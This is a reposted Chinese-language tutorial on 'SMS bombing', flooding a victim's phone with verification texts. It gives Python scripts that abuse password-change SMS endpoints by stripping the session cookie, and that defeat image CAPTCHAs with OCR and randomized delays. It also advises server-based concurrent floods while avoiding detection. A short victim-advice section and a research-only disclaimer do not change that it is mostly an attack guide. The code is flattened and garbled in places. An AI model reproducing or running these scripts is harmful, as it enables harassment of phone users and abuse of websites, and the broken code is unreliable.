一文教会你短信轰炸程序原理以及脚本

admin 2025年4月20日21:02:50评论0 views字数 3294阅读10分58秒阅读模式
1、目录
  1. 目录
  2. 什么是“短信轰炸”
  3. 三种批量请求方法
  4. 被短信轰炸如何应对
  5. 交流群和免费圈子
2、什么是“短信轰炸”
“短信轰炸”是非法行为,是使用特殊手段请求大批量短信到受害者手机中,导致受害者卡死。的行为。
一文教会你短信轰炸程序原理以及脚本
3、三种批量请求方法
3.1、通过网站漏洞发送批量短信(不推荐)
“通过网站漏洞发送批量短信”的方法,是网站本身逻辑编写出现了问题,可能是:缺乏请求频率限制、验证机制不完善、接口判断逻辑简单 等。这类请求方法我个人不推荐,因为会被修复导致请求失败。
而且有些网站还有Coolie验证对此还要进行绕过以下代码仅供参考:
import requestslogin_url = '网站url'login_payload = {'username''test''password''test'}login_response = requests.post(login_url, data=login_payload)cookies = login_response.cookiesmodify_password_url = '网站url'modify_payload = {'phone''电话号码''new_password''newpass'}if'session_id' in cookies:    del cookies['session_id']response = requests.post(modify_password_url, data=modify_payload, cookies=cookies)print(f"尝试修改密码并发送短信,响应:{response.text}")
import requestslogin_url = '网站url'modify_password_url ='网站url的modify_password'login_payload = {'username''test''password''test'}modify_payload = {'phone''电话号码''new_password''newpass'}try:    login_response = requests.post(login_url, data=login_payload)    if login_response.status_code == 200:        print("登录成功")        cookies = login_response.cookies        if 'session_id' in cookies:            del cookies['session_id']            print("已删除'session_id'")        response = requests.post(modify_password_url, data=modify_payload, cookies=cookies)        if response.status_code == 200:            print(f"修改密码请求成功,响应内容:{response.text}")        else:            print(f"修改密码请求失败,状态码:{response.status_code}, 响应内容:{response.text}")    else:        print(f"登录失败,状态码:{login_response.status_code}, 响应内容:{login_response.text}")except requests.exceptions.RequestException as e:    print(f"请求过程中发生错误:{e}")
3.2、搭建服务器发送批量短信
搭建私有服务器,使用服务器进行并发攻击:
一文教会你短信轰炸程序原理以及脚本
一文教会你短信轰炸程序原理以及脚本
搭建私有服务器使用进行并发攻击有两个痛点:
  • 多次发送会被运营商检测并加入黑名单
  • 容易暴露自己以及服务器
好处是一次性并发数量比较多,还能使用电话并发呼叫。
谨慎使用!!!容易被发现
一文教会你短信轰炸程序原理以及脚本
3.3、通过仿人工的行为请求短信验证码
顾名思义,就是以“仿照人工”的行为,类似于爬虫:
参考代码(仅供参考):
import requestsimport timeimport randomfrom bs4 import BeautifulSoupfrom PIL import Imageimport pytesseractfrom io import BytesIOpytesseract.pytesseract.tesseract_cmd = r'C:Program Filesmoleyuyu.exe'def get_captcha(session, url, headers):    """获取并识别验证码"""    time.sleep(random.uniform(13))    response = session.get(url, headers=headers)    img = Image.open(BytesIO(response.content))    img = img.convert('L')    img = img.point(lambda x: 255 if x > 128 else 0)    captcha = pytesseract.image_to_string(img).strip()    return captchadef main():    base_url = "网站url"    captcha_url = "网站url"    headers = {        'User-Agent''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',        'Referer': base_url,        'Accept-Language''zh-CN,zh;q=0.9,en;q=0.8',    }    with requests.Session() as s:        s.get(base_url, headers=headers)        time.sleep(random.uniform(24))         captcha = get_captcha(s, captcha_url, headers)        print(f"识别到的验证码:{captcha}")        login_data = {            'username''your_username',            'password''your_password',            'captcha': captcha,        }        time.sleep(random.uniform(12))        response = s.post(base_url, data=login_data, headers=headers)        if '登录成功' in response.text:            print("登录成功!")        else:            print("登录失败,可能需要处理验证码错误")if __name__ == "__main__":    main()
一文教会你短信轰炸程序原理以及脚本

4、被短信轰炸如何应对

第一时间拨打你手机号码所属运营商的客服热线,如中国移动 10086、中国联通 10010、中国电信 10000。向客服人员详细说明你遭受短信轰炸的情况,包括短信发送的频率、大概的号码特征等信息。当短信轰炸行为涉及到恶意骚扰、威胁恐吓等内容,或者导致你遭受经济损失(如通过短信链接诱导你进行转账等操作)时,应该及时向公安机关报警。在报警时,要提供完整的证据,包括收到的短信记录(包括短信内容、发送号码、发送时间等),以便警方能够依法立案侦查,追究相关责任人的法律责任。

5、交流群和免费圈子

一文教会你短信轰炸程序原理以及脚本
一文教会你短信轰炸程序原理以及脚本

原文始发于微信公众号(知树安全团队):一文教会你“短信轰炸”程序原理以及脚本

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月20日21:02:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一文教会你短信轰炸程序原理以及脚本https://cn-sec.com/archives/3979610.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息